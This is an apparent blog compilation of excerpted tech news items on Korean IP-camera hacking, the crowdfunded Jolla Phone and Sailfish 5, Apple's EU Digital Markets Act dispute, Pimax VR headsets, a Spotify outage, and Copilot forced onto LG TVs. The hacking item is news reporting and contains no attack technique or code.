Project developers and maintainers write the fixes, and chief security officers can confirm to their boards of directors that their dependencies and critical code is secure. “Plus, the meantime for resolution for these issues comes down – and they are not funding groups like North Korea’s Lazarus,” he added.

In other words: Tea’s goal reaches fruition. Open source project maintainers get paid for their valuable work, code becomes more secure, financially motivated crews can’t game the system, and the world becomes a better place. ®

Source: CEO spills the Tea about massive token farming campaigns • The Register

Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

Posted on by

[…]hackers recently breached approximately 120,000 IP cameras across Korea — often found inside private homes like Kim’s — has left her and many others seething, prompting the government to take action.

As shocking the scale of the intrusions was the alleged motive behind them. Videos captured by the hacked cameras were allegedly sold to an overseas pornography website, exposing some of the most intimate moments of unsuspecting victims to anonymous viewers abroad.

Only 1,193 videos from the hacked cameras have been uncovered so far on overseas websites, raising concerns that many more remain undiscovered.

In response, an interagency task force comprising officials from the Ministry of Science and ICT, the Personal Information Protection Commission and the National Police Agency announced on Dec. 7 that it would pursue a multilayered reform package. The measures aim to shift responsibility beyond individuals and camera manufacturers to include installation companies and telecommunications providers.

Yet as policymakers scramble to overhaul regulations and reinforce technical safeguards, interviews with everyday users of IP cameras reveal a gap between how these devices are used and understood and the level of risk they actually pose.

[…]

any hacked cameras were protected by simple or widely known passwords that were rarely changed. A government survey found that only 59 percent of installation companies consistently carried out mandatory security measures, such as changing default password settings.

[…]

What sets the current case apart — and prompted the government’s unusually forceful response — is the nature of the harm involved.

Police believe one suspect hacked 63,000 IP cameras, producing 545 videos that he sold to an overseas website for 35 million won ($24,000) in cryptocurrency. Another suspect allegedly hacked 70,000 devices, creating 648 videos that he later sold to the same website for 18 million won.

The two individuals, whom police say are not accomplices, sourced most of their footage from IP cameras installed in ordinary homes, gynecology offices, breastfeeding rooms, massage parlors, Pilates studios and waxing salons. They often accessed the same compromised devices repeatedly. The videos accounted for 62 percent of all content on the website, which includes a separate “Korean” category.

Two additional suspects are accused of hacking 15,000 cameras and 136 devices, respectively, to collect footage for private possession.

Unlike leaked phone numbers or delivery addresses, compromised IP camera footage can expose faces, bodies, children and private spaces. Prof. Kim emphasized that hacked cameras can reveal “an individual’s movements, daily life and relationships,” making the potential for privacy violations “extremely high.”

[…]

Source: Mass hacking of IP cameras leave Koreans feeling vulnerable in homes, businesses

New Jolla Phone Pre-orders hit target quickly. Shows people are fed up with iOS-Android monopoly

Posted on by

After successful crowdfunding, the latest release of the original handheld Linux distro will power a new handset coming in mid-2026.

The initial crowdfunding drive for the new Jolla Phone seems to have gone well: at the time of writing, the new device has comfortably passed double the number of orders needed to go into production. Finnish vendor Jolla set a goal of 2,000 €99 pre-order deposits by January 4th, but passed the goal in less than two weeks. The first batch of 2,700 units were £499. Batch 2 will ship two to four weeks later, and cost €549, but that’s now sold out too. Currently, well over 5,000 orders have been placed. With 20 days to go, the pre-order page says:

We take a maximum of 10,000 pre-orders until January 31st, 2026. Reserve your spot and lock your special total price of 579€.

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black

The new Jolla Phone, resplendent in The Orange – or Snow White and Kaamos Black – Click to enlarge

The down payment will be deducted from the total price. Jolla is now taking orders for 5,200 units in batch 3, which will cost €579 and ship three to six weeks later. After the first few production runs, totalling 10,000 units, the price of the handset will go up to €599 to €699.

The phone specs were set by a survey the company ran, with a first stage in August followed by November update. To our eyes it looks decent if not outstanding: 5G connectivity, a 6.36 inch AMOLED screen, an indicator LED, 12 GB of RAM plus 256 GB of storage expandable via microSDXC. Some of the details are welcome: a user-replaceable 5,500 mAh battery, plus a software-based privacy switch which can disable the microphone, or Bluetooth, or Android apps, or other programmable options. For this vulture, a sad absence is a headphone socket.

An added incentive, if the device sells 10,000 units, is the return of smart back covers called The Other Half, which even included a keyboard.

[…]

Sailfish is distinct from any other mobile OS today. Its origins at Nokia predate the January 2007 launch of the iPhone, by whose prospects The Reg was not enthralled. That, of course, also means it was out long before Android, which as Daring Fireball described in 2010 was originally designed to rival Blackberry. (The Internet Archive still has some of Engadget’s screenshots.) After Android was remodeled to take on Apple, both OSes look a lot like each other: the home screen is a grid of app icons, and both lean heavily on tapping on-screen buttons. (Before that, of course, they relied on physical buttons.)

[…]

Sailfish 5 feels very different, with little visible influence from anything else. You flip between its two home screens by swiping left and right. One holds a list of messages and notifications, and the other is a full-screen app switcher, with tiles for each open app. Dragging up from the bottom reveals the app launcher. Uniquely, it distinguishes between long and short drags down from the top of the screen: a long fast swipe down opens a settings panel, but in native Salfish apps, a short slow drag opens a full-screen-width menu; you scroll up and down until the desired option is highlighted, then select it by lifting your thumb. It shows whether options are turned on or off with a large, bright white dot, or a smaller dimmer dot. A different white dot at top left is also the Back button, where one makes sense.

Like the overloaded white-dot symbol, some aspects of the OS are a little confusing. In addition to the official Jolla Store, there are two different tools for managing third-party native apps: StoreMan manages software from the collection on OpenRepos, and Chum GUI manages RPM packages from Chum. Then there’s the built-in AppSupport compatibility layer, which lets you run Android apps. We installed both F-Droid and the Aurora store, and had no problems installing any typical tools such as Signal, Whatsapp, or YouTube Kids.

There are built-in apps for all the things you’d expect a smartphone to do, and these connect to the usual suspects such as Google’s email, calendar, and contacts. There’s a browser based on Mozilla tech, as well, which works fine – as did Android browsers such as Vivaldi. Like its very distant relative Symbian, though, this is a local-first sort of device which can sync, rather than a pocket cloud client.

Maps are a particular weak point: we tried Google Maps and Nokia spin-off Here, which both literally drew a blank. The OpenStreetMap-based Mapy.com ran and could be searched, but couldn’t detect our location. There aren’t many cloud-storage clients, either. The stock keyboard doesn’t support swipe-style text entry, which we found frustrating.

Overall, Sailfish is arguably the most complete independent mobile OS. It’s totally separate from anything from Google, or Apple, or desktop Linux, and the app catalog is impressive. We did regularly get lost in its slightly idiosyncratic UI, but it was always possible to get out again. If you want a total break from the mainstream mobile duopoly, this is a viable alternative. Although you might need a standalone sat-nav too.

[…]

Source: New Jolla, Sailfish 5, offer break from iOS-Android monopoly • The Register

Devs say Apple still flouting EU’s DMA six months on, but cutting fees in US

Posted on by
Six months after EU regulators found Apple’s App Store rules

The Coalition for App Fairness, a nonprofit organization of app developers and consumer groups, has accused Apple of persistent non-compliance with the DMA, warning that the company’s revised App Store terms continue to impose fees which the legislation prohibits.

In an open letter addressed to European Commission President Ursula von der Leyen and senior commissioners, the coalition argues that Apple has failed to deliver “any meaningful changes or proposals” despite an April 2025 non-compliance decision that found its App Store policies illegal and harmful to both developers and consumers.

At the heart of the complaint is money. The DMA requires so-called gatekeepers to allow developers to offer and conduct transactions outside their app stores without charge. Apple, the coalition claims, is seeking to charge commissions of up to 20 percent on those very transactions.

“This is a blatant disregard for the law with the potential to vanquish years of meaningful work by the Commission,” the letter states, accusing Apple of preserving the economics of its App Store while nominally claiming compliance.

Apple has said it will roll out new App Store terms in January 2026, but developers say the company has provided no clarity on what those changes will involve or whether they will actually comply with the DMA.

“We have seen this playbook before in Europe and beyond,” the signatories warn, adding that they suspect any new terms will continue to impose fees that would violate the law.

The letter argues that this uncertainty is already doing damage. Six months after Apple’s last App Store terms update, developers still do not know which rules will govern their businesses or what their costs will look like in the near term.

Apple’s “lack of transparency in tandem with its rushed timelines,” the coalition says, is freezing investment and innovation, effectively allowing the company to “exploit its gatekeeper position by holding the entire industry hostage.”

The group also points to a growing transatlantic contrast that makes Europe look like the tougher regulator with the weaker results. While Apple continues to fight DMA enforcement in the EU, US courts have moved to curb its ability to extract fees from external transactions. Following litigation brought by Epic Games, developers in the US can now communicate freely with customers about pricing and offer payment options outside Apple’s ecosystem without paying commission.

That raises what the coalition calls a “simple and urgent question.” Why should European developers and consumers get a worse deal than their US counterparts, especially when the EU was first to pass a landmark law aimed at fixing digital markets?

[…]

Source: Devs say Apple still flouting EU’s DMA six months on • The Register

Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE – light 8k VR

Posted on by

Pimax, a manufacturer of virtual reality (VR) hardware, debuted its next generation of PC virtual reality (PCVR) headsets to the public at CES 2026. The company demonstrated the final production model of the ‘Crystal Super Micro-OLED,’ alongside its new ‘Dream Air’ and ‘Dream Air SE’ devices.

Both the Crystal Super Micro-OLED and the Dream Air utilize the same optical stack, featuring 4K Sony micro-OLED panels per eye and Pimax’s proprietary “ConcaveView” lens technology. The company noted that the Dream Air SE is positioned as a more affordable version of the Dream Air, though it also utilizes the ConcaveView lenses.

Through close collaboration with hardware partners, Pimax stated that it aims to demonstrate how high-end PCVR can reach its full potential as part of a complete ecosystem. Attendees at CES were able to experience motion feedback and control systems across racing, flight, and active VR setups.

Auganix Managing Editor Sam Sprigg tries a racing sim demo with Pimax’s new Dream Air headset at CES 2026.

Source: Pimax debuts Crystal Super Micro-OLED, Dream Air, & Dream Air SE

Spotify was down this morning for thousands of users

Posted on by

My boyfriend texted me those dreaded four words: “Is your Spotify down?” Sure enough his, mine and thousands of other users’ Spotify accounts appear to be down and out at the moment, with Downdetector recording over 10,000 reports from users.

Spotify is apparently working on the problem. The account, Spotify Status, shared an update on X at 9:45 AM on Monday, “We’re aware of some issues right now and are checking them out!” About an hour later, the company shared an update saying that the outage was resolved as of 10:34 AM ET.

Source: Spotify was down this morning for thousands of users: Updates on the widespread outages

After Samsung forces Gemini, LG TV users get unremovable Microsoft Copilot through forced update

Posted on by

LG smart TV owners are reporting that a recent webOS software update has added Microsoft Copilot to their TVs, with no apparent way to remove it. Reports first surfaced over the weekend on Reddit, where a post showing a Copilot tile pinned to an LG TV home screen climbed to more than 35,000 upvotes on r/mildlyinfuriating, accompanied by hundreds of comments from users describing the same behavior.

According to affected users, Copilot appears automatically after installing the latest webOS update on certain LG TV models. The feature shows up on the home screen alongside streaming apps, but unlike Netflix or YouTube, it cannot be uninstalled.

LG has previously confirmed plans to integrate Microsoft Copilot into webOS as part of its broader “AI TV” strategy. At CES 2025, the company described Copilot as an extension of its AI Search experience, designed to answer questions and provide recommendations using Microsoft’s AI services. In practice, the iteration of Copilot currently seen on LG TVs appears to function as a shortcut to a web-based Copilot interface rather than a fully native application like the one described by LG.

The issue, for many, isn’t necessarily what Copilot does, but that it has been forced onto consumers with no option to remove it. LG’s own support documentation notes that certain preinstalled or system apps cannot be deleted, only hidden. Users who encounter Copilot after the update report that this limitation applies, leaving them with no way to fully remove the feature once it has been added. It’s a similar story on rival models, for instance some Samsung TV’s include Gemini.

The overwhelmingly negative reaction from users indicates a growing frustration with AI features being imposed on consumers in every way possible. Smart TVs have naturally become platforms for advertising, data collection, and now AI services, with updates adding new functionality that owners did not explicitly request and, in most cases, do not want. While LG allows users to disable some AI-related options, such as voice recognition and personalization features, those settings do not remove the Copilot app itself.

Ultimately, those wanting to minimize Copilot’s presence on their TVs are limited to keeping it disconnected from the Internet. That’s about the most that can be done at the moment, unless LG backtracks and either allows users to disable or completely uninstall the app in response to backlash, which seems unlikely.

Source: LG TV users baffled by unremovable Microsoft Copilot installation — surprise forced update shows app pinned to the home screen | Tom’s Hardware